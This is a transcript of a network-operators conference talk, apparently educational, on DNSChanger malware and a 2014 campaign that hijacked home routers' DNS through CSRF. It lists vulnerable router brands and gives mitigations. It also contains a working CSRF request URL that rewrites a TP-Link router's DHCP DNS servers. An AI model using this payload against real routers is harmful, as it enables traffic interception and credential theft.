11 (IDNOG01) DNS Changer by Alfonso Tanujaya
-
Upload
indonesia-network-operators-group -
Category
Education
-
view
316 -
download
2
Transcript of 11 (IDNOG01) DNS Changer by Alfonso Tanujaya
DNSchanger 2014
Alfons Tanujaya
DNSchanger 2007
• Aktif 2007 - 2011Infeksi lebih dari 4 juta komputer
PC dan MacOnline adv, spam, scamKeuntungan 140
milyar8 Maret 2012, server bring down, kiamat
kecil internet ?
DNSchanger 1
DNSChanger 2014
What is this ?
• Antivirus merek apapun tidak bisa mengatasi
malware ini.Tidak hanya berdampak pada Windows
tetapi pada Linux, Mac dan Android
phone.Sekalipun komputer di format, akan
kembali lagi terjadi.Sea-surf =
CSRF
CSRF Cross Site Request Forgery
A type of malicious exploit of a website whereby
unauthorized commands are transmitted from a user
that the website trusts. Unlike cross-site scripting
(XSS), which exploits the trust a user has for a
particular site, CSRF exploits the trust that a site has
in a user's browser.Attack is blind. Not good for
credential stealing.But ordinary weapon in a smart
criminal can be deadly.
get
Login
form
Session Cookie
UN
PS
Post Cookie
get
Auto submit form
Post Cookie
DNSChanger 2014
Changing DNS of vulnerable routers.Log all traffic →
proxy, credential leak.Lead to install malware.Lead
to forgery website, can lead to leak of
credential.Improper advertisement, porn, malware
etc.How many victims ? 300.000 routers x 5 users =
1,5 million computers.
How it happen
http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199
&Lease=120&gateway=0.0.0.0&domain=&dnsserver=1
62.248.99.162&dnsserver2=199.85.127.10&Save=%B1%
A3+%B4%E6
List of vulnerable routers
TP LinkD-LinkMicronetTenda
Solution
Sea Surf
SEA MONKEY
SOLUSI
Upgrade firmware ← Tidak selalu sukses→ OpenWRT
(WiT ?)Solusi, set dns di client dgn DNS isp / google,
local DNS overpower router, kecuali dipaksa routerT-
FA Challenge tokenTidak gunakan web based
administrationGunakan httpsGunakan browser
berbeda khusus untuk administrasi router
berbeda dengan browsing
Resource
http://cxsecurity.com/issue/WLB-2012100027